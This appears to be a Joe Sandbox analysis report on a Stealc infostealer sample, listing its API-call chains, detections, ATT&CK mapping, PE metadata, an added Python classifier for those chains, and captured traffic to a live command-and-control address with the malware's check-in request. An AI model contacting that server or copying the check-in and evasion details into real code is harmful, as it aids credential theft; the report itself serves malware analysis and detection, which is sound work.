Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EF9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF9750 mov eax, dword ptr fs:[00000030h]0_2_00EF9750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00EF78E0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 2552, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00EF9600
Source: file.exe, file.exe, 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: XProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00EF7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00EF7980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00EF7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00EF7A30
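The "Code function" lines in this section and in the evasion section above give, for each statically identified function of the unpacked payload, the Win32 APIs it calls in order: FindFirstFileA/CopyFileA/DeleteFileA/FindNextFileA loops (file grabbing), CreateToolhelp32Snapshot/Process32First/Process32Next (process enumeration), long GetProcAddress runs (import resolution at runtime), a read of fs:[30h] (the PEB), and GetComputerNameA/GetUserNameA/GetLocalTime/GetTimeZoneInformation/GetKeyboardLayoutList (victim fingerprinting). The script below is an added example, not part of the report and not Stealc's code: it parses those lines and tags each function with the behavioural pattern its chain matches. The nine sample lines are copied from the report; the pattern names, the ordered-subsequence matching and the threshold of eight GetProcAddress calls are the example's own choices.

```python
"""Classify the per-function API chains from Joe Sandbox "Code function" lines.

Added example, not part of the report.  Pattern names and thresholds are the
example author's, not the sandbox's.
"""
import re
from collections import Counter

# Sample lines copied verbatim from the report (text after the "Source:" column).
SAMPLE_LINES = [
    "Code function: 0_2_00EF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,"
    "CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,"
    "__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EF38B0",
    "Code function: 0_2_00EEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,"
    "FindNextFileA,FindClose,0_2_00EEDA80",
    "Code function: 0_2_00EE1160 GetSystemInfo,ExitProcess,0_2_00EE1160",
    "Code function: 0_2_00EE45C0 VirtualProtect ?,00000004,00000100,000000000_2_00EE45C0",
    "Code function: 0_2_00EF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,"
    "GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,"
    "GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,"
    "GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,"
    "GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,"
    "0_2_00EF9860",
    "Code function: 0_2_00EF9750 mov eax, dword ptr fs:[00000030h]0_2_00EF9750",
    "Code function: 0_2_00EF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00EF78E0",
    "Code function: 0_2_00EF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,"
    "0_2_00EF9600",
    "Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00EF7B90",
]

# Function ids look like 0_2_00EF38B0 (pid index, run index, address).
FUNC_ID_RE = re.compile(r"\d+_\d+_[0-9A-Fa-f]{8}")

# (tag, kind, payload): "seq" = calls in this order (others may sit between),
# "any" = at least one of these calls, "count" = a call repeated >= N times,
# "raw" = literal text anywhere in the line (non-API evidence such as a PEB read).
RULES = [
    ("directory walk", "seq", ["FindFirstFileA", "FindNextFileA"]),
    ("file grabber loop", "seq", ["FindFirstFileA", "CopyFileA", "DeleteFileA", "FindNextFileA"]),
    ("process enumeration", "seq", ["CreateToolhelp32Snapshot", "Process32First", "Process32Next"]),
    ("victim fingerprinting", "any", {"GetComputerNameA", "GetUserNameA", "GetLocalTime",
                                      "GetTimeZoneInformation", "GetKeyboardLayoutList",
                                      "GetLocaleInfoA", "GetSystemInfo"}),
    ("dynamic import resolution", "count", ("GetProcAddress", 8)),
    ("PEB access", "raw", "fs:[00000030h]"),
    ("page protection change", "any", {"VirtualProtect"}),
    ("hard exit", "any", {"ExitProcess"}),
]


def is_subsequence(needle, haystack):
    """True if every element of needle occurs in haystack in the same order."""
    it = iter(haystack)
    return all(any(x == y for y in it) for x in needle)


def parse_line(line):
    """Return (function_id, [call names]) or None for lines of another kind."""
    m = re.search(r"Code function: (.*)$", line)
    if not m:
        return None
    body = m.group(1)
    ids = FUNC_ID_RE.findall(body)
    func_id = ids[0] if ids else None
    body = FUNC_ID_RE.sub("", body)
    # Keep the leading token of each comma-separated item so that
    # "VirtualProtect ?" and argument values do not hide the API name.
    calls = [item.split()[0] for item in body.split(",") if item.strip()]
    return func_id, calls


def _matches(kind, payload, calls, counts, line):
    if kind == "seq":
        return is_subsequence(payload, calls)
    if kind == "any":
        return any(c in counts for c in payload)
    if kind == "count":
        return counts[payload[0]] >= payload[1]
    return payload in line          # "raw"


def classify(line):
    """Return (function_id, [tags]) or None for a non-matching line."""
    parsed = parse_line(line)
    if parsed is None:
        return None
    func_id, calls = parsed
    counts = Counter(calls)
    tags = [tag for tag, kind, payload in RULES
            if _matches(kind, payload, calls, counts, line)]
    return func_id, tags


def summarize(lines):
    """{function_id: [tags]} for every classifiable line."""
    return dict(filter(None, map(classify, lines)))


if __name__ == "__main__":
    for func_id, tags in summarize(SAMPLE_LINES).items():
        print(func_id, "->", ", ".join(tags) or "(no pattern)")
```

Ordered-subsequence matching is deliberate: the grabber loop is only credible when the copy and delete sit between FindFirstFileA and FindNextFileA, which is exactly how the report's 0_2_00EF38B0 and similar functions read, whereas 0_2_00EEDA80 enumerates a directory without copying anything and is tagged only as a walk.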

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1586910979.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2552, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1586910979.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2552, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix

The matrix is listed per tactic column. A number in parentheses is the report's count of matching signatures for that technique; entries without a number are the matrix's standard placeholder cells and were not matched.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                    Source | Detection | Scanner | Label | Link
                    file.exe | 45% | ReversingLabs | Win32.Trojan.Generic |
                    file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                    file.exe | 100% | Joe Sandbox ML | |
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://185.215.113.37/ | 100% | URL Reputation | malware |
                    http://185.215.113.37 | 100% | URL Reputation | malware |
                    http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
                    No contacted domains info
                    Name | Malicious | Antivirus Detection | Reputation
                    http://185.215.113.37/ | true | URL Reputation: malware | unknown
                    http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://185.215.113.37 | file.exe, 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                    http://185.215.113.37/e2b1563c6670f193.phpW | file.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                    http://185.215.113.37/e2b1563c6670f193.phpg | file.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1525809
                    Start date and time:2024-10-04 16:37:18 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 23s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 80%
                    • Number of executed functions: 19
                    • Number of non-executed functions: 81
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes were analyzed, report is missing behavior information
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe
                    No simulations
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    185.215.113.37 | niko.exe | malicious | Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                    185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                    185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                    185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                    185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                    185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                    185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                    185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                    185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                    185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                    No context
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    WHOLESALECONNECTIONSNL | niko.exe | malicious | Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.103
                    WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                    WHOLESALECONNECTIONSNL | Setup.exe | malicious | RedLine | 185.215.113.22
                    WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                    WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                    WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                    WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                    WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                    WHOLESALECONNECTIONSNL | Aura.exe | malicious | RedLine | 185.215.113.22
                    WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                    No context
                    No context
                    No created / dropped files found
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.94691415061976
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'831'424 bytes
                    MD5:8baeb58f65c1b9077a14792bd25a17f3
                    SHA1:9908569a2920d3693bb0eba3692c48132a5b25a9
                    SHA256:f9c5550df902ffa0b701eb230cb26c712d35688efcae92636488915de920c6a8
                    SHA512:00b3182acb2fd6ad034057eb35d6030bb4765c38ef0ad0cd0d7a424943ef5ce642aa171a02988d403921286c15175738cd9dfebdb161940e41d4e18f4f31b5e8
                    SSDEEP:49152:8o6yjQsVYdT3lEPmc+KRDxmNkgHWAx9QC5Iy:1666hqPm0jmqPU5Iy
                    TLSH:2A853322471A637EEE9937BB2D671F711A90F3C0794162612A172A1ED523FF23B14D4C
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                    Icon Hash:00928e8e8686b000
                    Entrypoint:0xa92000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007FF8E90A8A6Ah
                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2010 build 30319
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    (unnamed) | 0x1000 | 0x25b000 | 0x22800 | c254acb27ac622c5475233e3cf6db1cd | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    (unnamed) | 0x25e000 | 0x29a000 | 0x200 | 86d765457e5a74e54b72c1607480d0bf | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    aufxidhi | 0x4f8000 | 0x199000 | 0x199000 | a3314062c12bfe42ba1175fd67836522 | False | 0.9946545738462714 | data | 7.9520679718814815 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    uxstyozv | 0x691000 | 0x1000 | 0x400 | d9137b2f9daf76f364280e959e2eafb7 | False | 0.7587890625 | data | 6.016050386408088 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant | 0x692000 | 0x3000 | 0x2200 | e47df74b20f86bbcc67b5f274d6f6df8 | False | 0.05618106617647059 | DOS executable (COM) | 0.659888870078411 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    DLL | Import
                    kernel32.dll | lstrcpy
                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                    2024-10-04T16:38:40.006563+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.9 | 49706 | 185.215.113.37 | 80 | TCP
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Oct 4, 2024 16:38:38.850904942 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                    Oct 4, 2024 16:38:38.862205029 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                    Oct 4, 2024 16:38:38.862350941 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                    Oct 4, 2024 16:38:38.862658024 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                    Oct 4, 2024 16:38:38.877414942 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                    Oct 4, 2024 16:38:39.583302021 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                    Oct 4, 2024 16:38:39.583431959 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                    Oct 4, 2024 16:38:39.771542072 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                    Oct 4, 2024 16:38:39.777360916 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                    Oct 4, 2024 16:38:40.006454945 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                    Oct 4, 2024 16:38:40.006562948 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                    Oct 4, 2024 16:38:42.954617977 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                    • 185.215.113.37
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.9 | 49706 | 185.215.113.37 | 80 | 2552 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Oct 4, 2024 16:38:38.862658024 CEST | 89 | OUT
                    GET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Oct 4, 2024 16:38:39.583302021 CEST | 203 | IN
                    HTTP/1.1 200 OK
                    Date: Fri, 04 Oct 2024 14:38:39 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Oct 4, 2024 16:38:39.771542072 CEST | 412 | OUT
                    POST /e2b1563c6670f193.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG
                    Host: 185.215.113.37
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 34 42 42 33 31 42 36 44 44 38 31 32 36 33 38 30 30 30 39 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a
                    Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="hwid"5D4BB31B6DD81263800096------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build"doma------HDBGDHDAECBGDHJKFIDG--
                    Oct 4, 2024 16:38:40.006454945 CEST | 210 | IN
                    HTTP/1.1 200 OK
                    Date: Fri, 04 Oct 2024 14:38:39 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 59 6d 78 76 59 32 73 3d
                    Data Ascii: YmxvY2s=


                    Target ID:0
                    Start time:10:38:32
                    Start date:04/10/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0xee0000
                    File size:1'831'424 bytes
                    MD5 hash:8BAEB58F65C1B9077A14792BD25A17F3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1586910979.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true


                      Execution Graph

                      Execution Coverage:9.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:10.1%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:24
14218->14219 14220 ee45c0 2 API calls 14219->14220 14221 ee35d7 14220->14221 14222 ee45c0 2 API calls 14221->14222 14223 ee35f0 14222->14223 14224 ee45c0 2 API calls 14223->14224 14225 ee3609 14224->14225 14226 ee45c0 2 API calls 14225->14226 14227 ee3622 14226->14227 14228 ee45c0 2 API calls 14227->14228 14229 ee363b 14228->14229 14230 ee45c0 2 API calls 14229->14230 14231 ee3654 14230->14231 14232 ee45c0 2 API calls 14231->14232 14233 ee366d 14232->14233 14234 ee45c0 2 API calls 14233->14234 14235 ee3686 14234->14235 14236 ee45c0 2 API calls 14235->14236 14237 ee369f 14236->14237 14238 ee45c0 2 API calls 14237->14238 14239 ee36b8 14238->14239 14240 ee45c0 2 API calls 14239->14240 14241 ee36d1 14240->14241 14242 ee45c0 2 API calls 14241->14242 14243 ee36ea 14242->14243 14244 ee45c0 2 API calls 14243->14244 14245 ee3703 14244->14245 14246 ee45c0 2 API calls 14245->14246 14247 ee371c 14246->14247 14248 ee45c0 2 API calls 14247->14248 14249 ee3735 14248->14249 14250 ee45c0 2 API calls 14249->14250 14251 ee374e 14250->14251 14252 ee45c0 2 API calls 14251->14252 14253 ee3767 14252->14253 14254 ee45c0 2 API calls 14253->14254 14255 ee3780 14254->14255 14256 ee45c0 2 API calls 14255->14256 14257 ee3799 14256->14257 14258 ee45c0 2 API calls 14257->14258 14259 ee37b2 14258->14259 14260 ee45c0 2 API calls 14259->14260 14261 ee37cb 14260->14261 14262 ee45c0 2 API calls 14261->14262 14263 ee37e4 14262->14263 14264 ee45c0 2 API calls 14263->14264 14265 ee37fd 14264->14265 14266 ee45c0 2 API calls 14265->14266 14267 ee3816 14266->14267 14268 ee45c0 2 API calls 14267->14268 14269 ee382f 14268->14269 14270 ee45c0 2 API calls 14269->14270 14271 ee3848 14270->14271 14272 ee45c0 2 API calls 14271->14272 14273 ee3861 14272->14273 14274 ee45c0 2 API calls 14273->14274 14275 ee387a 14274->14275 14276 ee45c0 2 API calls 14275->14276 14277 ee3893 14276->14277 14278 ee45c0 2 API calls 14277->14278 14279 ee38ac 14278->14279 14280 ee45c0 2 API calls 14279->14280 14281 ee38c5 14280->14281 